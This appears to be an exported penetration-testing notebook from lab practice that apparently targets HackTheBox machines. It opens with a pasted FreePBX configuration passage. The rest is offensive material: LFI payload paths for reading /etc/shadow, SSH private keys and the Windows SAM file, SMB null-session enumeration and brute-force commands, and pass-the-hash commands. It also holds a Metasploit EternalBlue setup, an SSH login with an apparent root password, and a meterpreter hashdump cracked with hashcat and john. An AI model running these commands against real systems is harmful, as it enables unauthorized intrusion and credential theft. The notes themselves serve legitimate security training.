extensions that have CW enabled, report unanswered CW calls as 'busy' (resulting in busy # voicemail greeting). If set to no, unanswered CW calls simply report as 'no-answer'. # AMPBADNUMBER=true|false # DEFAULT VALUE: true # Generate the bad-number context which traps any bogus number or feature code and plays a # message to the effect. If you use the Early Dial feature on some Grandstream phones, you # will want to set this to false. # AMPBACKUPSUDO=true|false # DEFAULT VALUE: false # This option allows you to use sudo when backing up files. Useful ONLY when using AMPPROVROOT # Allows backup and restore of files specified in AMPPROVROOT, based on permissions in /etc/sudoers # for example, adding the following to sudoers would allow the user asterisk to run tar on ANY file # on the system: # asterisk localhost=(root)NOPASSWD: /bin/tar # Defaults:asterisk !requiretty # PLEASE KEEP IN MIND THE SECURITY RISKS INVOLVED IN ALLOWING THE ASTERISK USER TO TAR/UNTAR ANY FILE # CUSTOMASERROR=true|false # DEFAULT VALUE: true # If false, then the Destination Registry will not report unknown destinations as errors. This should be # left to the default true and custom destinations should be moved into the new custom apps registry. # DYNAMICHINTS=true|false # DEFAULT VALUE: false # If true, Core will not statically generate hints, but instead make a call to the AMPBIN php script, # and generate_hints.php through an Asterisk's #exec call. This requires Asterisk.conf to be configured # with &quot;execincludes=yes&quot; set in the [options] section. # XTNCONFLICTABORT=true|false # BADDESTABORT=true|false # DEFAULT VALUE: false # Setting either of these to true will result in retrieve_conf aborting during a reload if an extension # conflict is detected or a destination is detected. It is usually better to allow the reload to go # through and then correct the problem but these can be set if a more strict behavior is desired. # SERVERINTITLE=true|false # DEFAULT VALUE: false # Precede browser title with the server name. # USEDEVSTATE = true|false # DEFAULT VALUE: false # If this is set, it assumes that you are running Asterisk 1.4 or higher and want to take advantage of the # func_devstate.c backport available from Asterisk 1.6. This allows custom hints to be created to support # BLF for server side feature codes such as daynight, followme, etc. # MODULEADMINWGET=true|false # DEFAULT VALUE: false # Module Admin normally tries to get its online information through direct file open type calls to URLs that # go back to the freepbx.org server. If it fails, typically because of content filters in firewalls that # don't like the way PHP formats the requests, the code will fall back and try a wget to pull the information. # This will often solve the problem. However, in such environment there can be a significant timeout before # the failed file open calls to the URLs return and there are often 2-3 of these that occur. Setting this # value will force FreePBX to avoid the attempt to open the URL and go straight to the wget calls. # AMPDISABLELOG=true|false # DEFAULT VALUE: true # Whether or not to invoke the FreePBX log facility # AMPSYSLOGLEVEL=LOG_EMERG|LOG_ALERT|LOG_CRIT|LOG_ERR|LOG_WARNING|LOG_NOTICE|LOG_INFO|LOG_DEBUG|LOG_SQL|SQL # DEFAULT VALUE: LOG_ERR # Where to log if enabled, SQL, LOG_SQL logs to old MySQL table, others are passed to syslog system to # determine where to log # AMPENABLEDEVELDEBUG=true|false # DEFAULT VALUE: false # Whether or not to include log messages marked as 'devel-debug' in the log system # AMPMPG123=true|false # DEFAULT VALUE: true # When set to false, the old MoH behavior is adopted where MP3 files can be loaded and WAV files converted # to MP3. The new default behavior assumes you have mpg123 loaded as well as sox and will convert MP3 files # to WAV. This is highly recommended as MP3 files heavily tax the system and can cause instability on a busy # phone system. # CDR DB Settings: Only used if you don't use the default values provided by FreePBX. # CDRDBHOST: hostname of db server if not the same as AMPDBHOST # CDRDBPORT: Port number for db host # CDRDBUSER: username to connect to db with if it's not the same as AMPDBUSER # CDRDBPASS: password for connecting to db if it's not the same as AMPDBPASS # CDRDBNAME: name of database used for cdr records # CDRDBTYPE: mysql or postgres mysql is default # CDRDBTABLENAME: Name of the table in the db where the cdr is stored cdr is default # AMPVMUMASK=mask # DEFAULT VALUE: 077 # Defaults to 077 allowing only the asterisk user to have any permission on VM files. If set to something # like 007, it would allow the group to have permissions. This can be used if setting apache to a different # user then asterisk, so that the apache user (and thus ARI) can have access to read/write/delete the # voicemail files. If changed, some of the voicemail directory structures may have to be manually changed. # DASHBOARD_STATS_UPDATE_TIME=integer_seconds # DEFAULT VALUE: 6 # DASHBOARD_INFO_UPDATE_TIME=integer_seconds # DEFAULT VALUE: 20 # These can be used to change the refresh rate of the System Status Panel. Most of # the stats are updated based on the STATS interval but a few items are checked # less frequently (such as Asterisk Uptime) based on the INFO value # ZAP2DAHDICOMPAT=true|false ZAP2DAHDICOMPAT=true # DEFAULT VALUE: false # If set to true, FreePBX will check if you have chan_dadhi installed. If so, it will # automatically use all your ZAP configuration settings (devices and trunks) and # silently convert them, under the covers, to DAHDI so no changes are needed. The # GUI will continue to refer to these as ZAP but it will use the proper DAHDI channels. # This will also keep Zap Channel DIDs working. # CHECKREFERER=true|false # DEFAULT VALUE: true # When set to the default value of true, all requests into FreePBX that might possibly add/edit/delete # settings will be validated to assure the request is coming from the server. This will protect the system # from CSRF (cross site request forgery) attacks. It will have the effect of preventing legitimately entering # URLs that could modify settings which can be allowed by changing this field to false. # USEQUEUESTATE=true|false # DEFAULT VALUE: false # Setting this flag will generate the required dialplan to integrate with the following Asterisk patch: # </rich_text>
						<rich_text link="webs https://issues.asterisk.org/view.php?id=15168">https://issues.asterisk.org/view.php?id=15168</rich_text>
						<rich_text> # This feature is planned for a future 1.6 release but given the existence of the patch can be used prior. Once # the release version is known, code will be added to automatically enable this format in versions of Asterisk # that support it. # USEGOOGLEDNSFORENUM=true|false # DEFAULT VALUE: false # Setting this flag will generate the required global variable so that enumlookup.agi will use Google DNS # 8.8.8.8 when performing an ENUM lookup. Not all DNS deals with NAPTR record, but Google does. There is a # drawback to this as Google tracks every lookup. If you are not comfortable with this, do not enable this # setting. Please read Google FAQ about this: </rich_text>
						<rich_text link="webs http://code.google.com/speed/public-dns/faq.html#privacy">http://code.google.com/speed/public-dns/faq.html#privacy</rich_text>
						<rich_text> # MOHDIR=subdirectory_name # This is the subdirectory for the MoH files/directories which is located in ASTVARLIBDIR # if not specified it will default to mohmp3 for backward compatibility. MOHDIR=mohmp3 # RELOADCONFIRM=true|false # DEFAULT VALUE: true # When set to false, will bypass the confirm on Reload Box # FCBEEPONLY=true|false # DEFAULT VALUE: false # When set to true, a beep is played instead of confirmation message when activating/de-activating: # CallForward, CallWaiting, DayNight, DoNotDisturb and FindMeFollow # DISABLECUSTOMCONTEXTS=true|false # DEFAULT VALUE: false # Normally FreePBX auto-generates a custom context that may be usable for adding custom dialplan to modify the # normal behavior of FreePBX. It takes a good understanding of how Asterisk processes these includes to use # this and in many of the cases, there is no useful application. All includes will result in a WARNING in the # Asterisk log if there is no context found to include though it results in no errors. If you know that you # want the includes, you can set this to true. If you comment it out FreePBX will revert to legacy behavior # and include the contexts. # AMPMODULEXML lets you change the module repository that you use. By default, it # should be set to </rich_text>
						<rich_text link="webs http://mirror.freepbx.org/">http://mirror.freepbx.org/</rich_text>
						<rich_text> - Presently, there are no third # party module repositories. AMPMODULEXML=</rich_text>
						<rich_text link="webs http://mirror.freepbx.org/">http://mirror.freepbx.org/</rich_text>
						<rich_text> # AMPMODULESVN is the prefix that is appended to tags in the XML file. # This should be set to </rich_text>
						<rich_text link="webs http://mirror.freepbx.org/modules/">http://mirror.freepbx.org/modules/</rich_text>
						<rich_text> AMPMODULESVN=</rich_text>
						<rich_text link="webs http://mirror.freepbx.org/modules/">http://mirror.freepbx.org/modules/</rich_text>
						<rich_text> AMPDBNAME=asterisk ASTETCDIR=/etc/asterisk ASTMODDIR=/usr/lib/asterisk/modules ASTVARLIBDIR=/var/lib/asterisk ASTAGIDIR=/var/lib/asterisk/agi-bin ASTSPOOLDIR=/var/spool/asterisk ASTRUNDIR=/var/run/asterisk ASTLOGDIR=/var/log/asterisk



</rich_text>
						<rich_text link="webs https://evi1us3r.wordpress.com/lfi-cheat-sheet/">https://evi1us3r.wordpress.com/lfi-cheat-sheet/</rich_text>
						<rich_text>
</rich_text>
						<rich_text link="webs https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal</rich_text>
						<rich_text>
</rich_text>
						<rich_text link="webs https://highon.coffee/blog/lfi-cheat-sheet/">https://highon.coffee/blog/lfi-cheat-sheet/</rich_text>
						<rich_text>
</rich_text>
						<rich_text link="webs https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf">https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf</rich_text>
						<rich_text>

LFI Cheat Sheet  
</rich_text>
						<rich_text weight="heavy">Useful LFI files</rich_text>
						<rich_text>
../../../../../etc/passwd%00
 
</rich_text>
						<rich_text weight="heavy">Linux:</rich_text>
						<rich_text>
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
 
</rich_text>
						<rich_text weight="heavy">Apache:</rich_text>
						<rich_text>
Configuration Files:
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
 
</rich_text>
						<rich_text weight="heavy">Log</rich_text>
						<rich_text> </rich_text>
						<rich_text weight="heavy">Files</rich_text>
						<rich_text>:
Red Hat/CentOS/Fedora Linux-   /var/log/httpd/access_log
Debian/Ubuntu-   /var/log/apache2/access.log
FreeBSD-   /var/log/httpd-access.log
 
</rich_text>
						<rich_text weight="heavy">Generic</rich_text>
						<rich_text>:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.log
 
</rich_text>
						<rich_text weight="heavy">MySql:</rich_text>
						<rich_text>
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI
 
</rich_text>
						<rich_text weight="heavy">Windows:</rich_text>
						<rich_text>
/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml

  Local File Inclusion/Remote File Inclusion (LFI/RFI) 
•  </rich_text>
						<rich_text link="webs http://www.grobinson.me/single-line-php-script-to-gain-shell/">http://www.grobinson.me/single-line-php-script-to-gain-shell/</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://webshell.co/">https://webshell.co/</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf">https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://osandamalith.com/2015/03/29/lfi-freak/">https://osandamalith.com/2015/03/29/lfi-freak/</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://wiki.apache.org/httpd/DistrosDefaultLayout#Debian.2C_Ubuntu_.28Apache_httpd_2.x.29">https://wiki.apache.org/httpd/DistrosDefaultLayout#Debian.2C_Ubuntu_.28Apache_httpd_2.x.29</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/">https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://attackerkb.com/Windows/blind_files">https://attackerkb.com/Windows/blind_files</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://digi.ninja/blog/when_all_you_can_do_is_read.php">https://digi.ninja/blog/when_all_you_can_do_is_read.php</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://updatedlinux.wordpress.com/2011/05/12/list-of-important-files-and-directories-in-linux-redhatcentosfedora/">https://updatedlinux.wordpress.com/2011/05/12/list-of-important-files-and-directories-in-linux-redhatcentosfedora/</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/">https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/</rich_text>
						<rich_text>
• </rich_text>
						<rich_text link="webs https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI_InterestingFiles-NullByteAdded.txt">https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI_InterestingFiles-NullByteAdded.txt</rich_text>
						<rich_text> 
• </rich_text>
						<rich_text link="webs http://www.r00tsec.com/2014/04/useful-list-file-for-local-file.html">http://www.r00tsec.com/2014/04/useful-list-file-for-local-file.html</rich_text>
						<rich_text> 
• </rich_text>
						<rich_text link="webs https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/">https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/</rich_text>
						<rich_text> 
• </rich_text>
						<rich_text link="webs https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI-FD-check.txt">https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI-FD-check.txt</rich_text>
						<rich_text> </rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Aqutone (for reporting)" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587584029.69" ts_lastsave="1587584050.27" unique_id="90">
						<rich_text></rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="davtest" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590777870.15" ts_lastsave="1590781280.28" unique_id="96">
						<rich_text>davtest -url &lt;url&gt; [options]
davtest -url </rich_text>
						<rich_text link="webs http://granny.htb">http://granny.htb</rich_text>
						<rich_text> -cleanup
---
********************************************************
 Testing DAV connection
OPEN            FAIL:   </rich_text>
						<rich_text link="webs http://target">http://target</rich_text>
						<rich_text>   The URL &quot;</rich_text>
						<rich_text link="webs http://target/&quot;">http://target/&quot;</rich_text>
						<rich_text> is not DAV enabled or not accessible.
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="cadaver" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590777966.97" ts_lastsave="1590781313.02" unique_id="97">
						<rich_text>cadaver [OPTIONS] </rich_text>
						<rich_text link="webs http://hostname[:port]/path">http://target[:port]/path</rich_text>
						<rich_text>
---
</rich_text>
					</node>
				</node>
				<node custom_icon_id="44" foreground="" is_bold="False" name="Other Services" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1587570784.47" unique_id="48">
					<rich_text></rich_text>
					<node custom_icon_id="0" foreground="" is_bold="False" name="SMB" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473455.56" ts_lastsave="1590579886.53" unique_id="49">
						<rich_text link="webs https://highon.coffee/blog/enum4linux-cheat-sheet/">https://highon.coffee/blog/enum4linux-cheat-sheet/</rich_text>
						<rich_text>

mount -t cifs &quot;//10.11.1.49/admin$&quot; /mnt/windows/ -o username=bethany\alice,domain=workgroup,password=loading1 --verbose

</rich_text>
						<rich_text scale="h2">SMB Enum</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Fingerprint SMB version</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Find open SMB Shares</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Enumerate SMB Users</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">SMB Server</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Pass the hash</rich_text>
						<rich_text>
</rich_text>
						<rich_text weight="heavy">SMB</rich_text>
						<rich_text>
In order to use pass the hash, we first need to put the hash in a env variable using the export command:
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

So we will atuhenticate against a smb-service.
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

I think you can run it like this too:
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text weight="heavy">Remote Desktop</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Exploits</rich_text>
						<rich_text>
EternalBlue (MS17-010)
</rich_text>
						<codebox char_offset="183" frame_height="1034" frame_width="700" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">nmblookup -A 10.1.1.1

smbclient //MOUNT/share -I 10.1.1.1 -N
# connect to share, -N no password prompt

smbclient -L \\10.11.1.1 -U bob -S off
rpcclient -p 139 -U &quot;bob&quot; -S off 10.11.1.1
# disable message signing

rpcclient -U &quot;&quot; 10.1.1.1
# works on older windows versions

enum4linux 10.1.1.1
# discover Windows/Samba servers on subnet, finds Windows MAC addresses, netbios name &amp; discover client workgroup/domain

nbtscan 10.1.1.0/24
# do everything, runs all options apart from dictionary based share name guessing

enum4linux -a 10.1.1.1
# performs all basic enumeration using smb null session

enum4linux -U 192.168.1.2   
#-You will get userlist
# SMB null session is an unauthenticated netbios session between two computers.
# SMB null session is available for SMB1 systems only i.e 2000,xp,2003

#To use an smb null session :
rpcclient -U &quot;&quot; 192.168.1.2
#when asked enter empty password
rpcclient $&gt;srvinfo
rpcclient $&gt;enumdomusers
rpcclient $&gt;querydominfo
rpcclient $&gt;getdompwinfo
#password policy
rpcclient $&gt;netshareenum
nmblookup -A 192.168.1.1
rpcinfo -p &lt;target&gt;

#Enumerate using smbclinet:
smbclient -L //192.168.1.2
smbclient -L //192.168.1.2/myshare -U anonymous

smb&gt; get data.txt
smb&gt;put evil.txt

#Brute SMB password:
nmap -p445 --script=smb-brute.nse &lt;ip&gt;

# Brute force should always be your last option. 
# You can also use hydra to do it.

#Using nmap:
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.1.200-254

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24

nmap -sSU -script smb-os-discovery.nse -p U:137,T:139,445 --script-args=smbsign=disable,smbuser=username,smbpass=password -oA 10.11.1.5_smbos -vv -n -Pn 10.11.1.5

nmap -sSU -script smb-vuln\* -p U:137,T:139,445 --script-args=smbsign=disable,smbuser=username,smbpass=password -oA 10.11.1.5_smbvuln -vv -n -Pn 10.11.1.5

nmap -sSU -script smb-enum\* -p U:137,T:139,445 --script-args=smbuser=username,smbpass=password -oA 10.11.1.5_smbenum -vv -n -Pn 10.11.1.5</codebox>
						<codebox char_offset="210" frame_height="44" frame_width="475" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True"></codebox>
						<codebox char_offset="234" frame_height="119" frame_width="475" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">nmap -oA 192.168.1.0_shares --script=smb-enum-shares --script-args=smbuser=username,smbpass=password -p445 192.168.1.0/24   
# possible techniques - specify no creds, empty creds, correct creds and incorrect creds

smbclient -L //192.168.1.100 -N
#list shares with no password prompt</codebox>
						<codebox char_offset="257" frame_height="44" frame_width="475" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">nmap --script=smb-enum-users -sSU -pU:137,T:139 -oA 192.168.1.200-254_smbusers 192.168.11.200-254 </codebox>
						<codebox char_offset="271" frame_height="125" frame_width="545" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">python /usr/share/doc/python-impacket/examples/smbserver.py probfine ./

#Get
copy \\10.1.1.1\probfine\payload .

#Put
copy C:\coolinfo \\10.1.1.1\probfine\</codebox>
						<codebox char_offset="397" frame_height="35" frame_width="590" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896</codebox>
						<codebox char_offset="447" frame_height="35" frame_width="365" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">pth-winexe -U administrator //192.168.1.101 cmd</codebox>
						<codebox char_offset="488" frame_height="35" frame_width="365" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">pth-winexe -U admin/hash:has //192.168.0.101 cmd</codebox>
						<codebox char_offset="506" frame_height="80" frame_width="455" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">apt-get update
apt-get install freerdp-x11

xfreerdp /u:admin /d:win7 /pth:hash:hash /v:192.168.1.101</codebox>
						<node custom_icon_id="0" foreground="" is_bold="False" name="enum4linux" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587571038.1" ts_lastsave="1590602741.72" unique_id="87">
							<rich_text>enum4linux -v target
---
</rich_text>
						</node>
						<node custom_icon_id="0" foreground="" is_bold="False" name="MetaSploit MS17-010" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590579886.53" ts_lastsave="1590603796.99" unique_id="92">
							<rich_text>msfconsole
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.223.62

</rich_text>
						</node>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="SNMP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473619.73" ts_lastsave="1587570434.53" unique_id="50">
						<rich_text></rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="DB" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473622.74" ts_lastsave="1500473677.59" unique_id="51">
						<rich_text></rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Other" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473623.25" ts_lastsave="1500473681.55" unique_id="52">
						<rich_text></rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="RPC" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587570784.47" ts_lastsave="1587570796.27" unique_id="85">
						<rich_text></rich_text>
					</node>
				</node>
			</node>
			<node custom_icon_id="22" foreground="" is_bold="False" name="Exploitation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1590801942.69" unique_id="53">
				<rich_text>searchsploit elastix
(freepbx 2.8.1.4)
18650.py


/etc/ssl/openssl.cnf
MinProtocol=TLSv1.0
CipherString = DEFAULT@SECLEVEL=1

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7
jEhdIekWmdjE</rich_text>
			</node>
			<node custom_icon_id="21" foreground="" is_bold="False" name="Post Exploitation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1590606029.51" unique_id="54">
				<rich_text></rich_text>
				<node custom_icon_id="44" foreground="" is_bold="False" name="Script Results" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1495714301.41" ts_lastsave="1495714310.34" unique_id="55">
					<rich_text></rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Host Information" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1500474204.83" unique_id="56">
					<rich_text underline="single" weight="heavy">Operating System</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Architecture</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Domain</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Installed Updates</rich_text>
					<rich_text>

</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="File System" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1500474208.8" unique_id="57">
					<rich_text underline="single" weight="heavy">Writeable Files\Directories</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Directory List</rich_text>
					<rich_text>




</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Running Processes" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1495714268.27" unique_id="58">
					<rich_text underline="single" weight="heavy">Process List</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Installed Applications" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1495714509.19" unique_id="59">
					<rich_text underline="single" weight="heavy">Installed Applications</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Users &amp; Groups" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1500474213.69" unique_id="60">
					<rich_text underline="single" weight="heavy">Users</rich_text>
					<rich_text>




</rich_text>
					<rich_text underline="single" weight="heavy">Groups</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Network" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1500474223.91" unique_id="61">
					<rich_text underline="single" weight="heavy">IPConfig\IFConfig
</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Network Processes</rich_text>
					<rich_text>




</rich_text>
					<rich_text underline="single" weight="heavy">ARP</rich_text>
					<rich_text>




</rich_text>
					<rich_text underline="single" weight="heavy">DNS</rich_text>
					<rich_text>




</rich_text>
					<rich_text underline="single" weight="heavy">Route</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Scheduled Jobs" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1496953428.46" unique_id="62">
					<rich_text underline="single" weight="heavy">Scheduled Tasks</rich_text>
				</node>
				<node custom_icon_id="0" foreground="" is_bold="False" name="Hashes: Hashcat" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590606014.85" ts_lastsave="1590606044.31" unique_id="94">
					<rich_text>meterpreter &gt; hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
---
hash-identifier
HASH: ffb43f0de35be4d9917ac0cc8ad57f8d

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
---


hashcat --help | grep NTLM
   5500 | NetNTLMv1                                        | Network Protocols
   5500 | NetNTLMv1+ESS                                    | Network Protocols
   5600 | NetNTLMv2                                        | Network Protocols
   1000 | NTLM                                             | Operating Systems

hashcat --force -a 0 -m 1000 hashes /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-6820HQ CPU @ 2.70GHz, 1024/2934 MB allocatable, 1MCU

Hashes: 3 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts &gt; length 32 but for the price of drastically reduced performance.                                                                                                   
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=1000 -D _unroll'                                      
* Device #1: Kernel m01000_a0-pure.21f31112.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs

31d6cfe0d16ae931b73c59d7e0c089c0:                
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22        
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: hashes
Time.Started.....: Wed May 27 14:58:56 2020 (7 secs)
Time.Estimated...: Wed May 27 14:59:03 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2165.1 kH/s (0.20ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10201088/14344385 (71.12%)
Rejected.........: 0/10201088 (0.00%)
Restore.Point....: 10200064/14344385 (71.11%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alread852 -&gt; alphasarto11

Started: Wed May 27 14:58:43 2020
Stopped: Wed May 27 14:59:04 2020
</rich_text>
				</node>
				<node custom_icon_id="0" foreground="" is_bold="False" name="Hashes: John" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590606029.51" ts_lastsave="1590606166.33" unique_id="95">
					<rich_text>meterpreter &gt; hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
---

hash-identifier
HASH: ffb43f0de35be4d9917ac0cc8ad57f8d

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
---

sudo john --format=NT --rules --wordlist=/usr/share/wordlists/rockyou.txt hashes
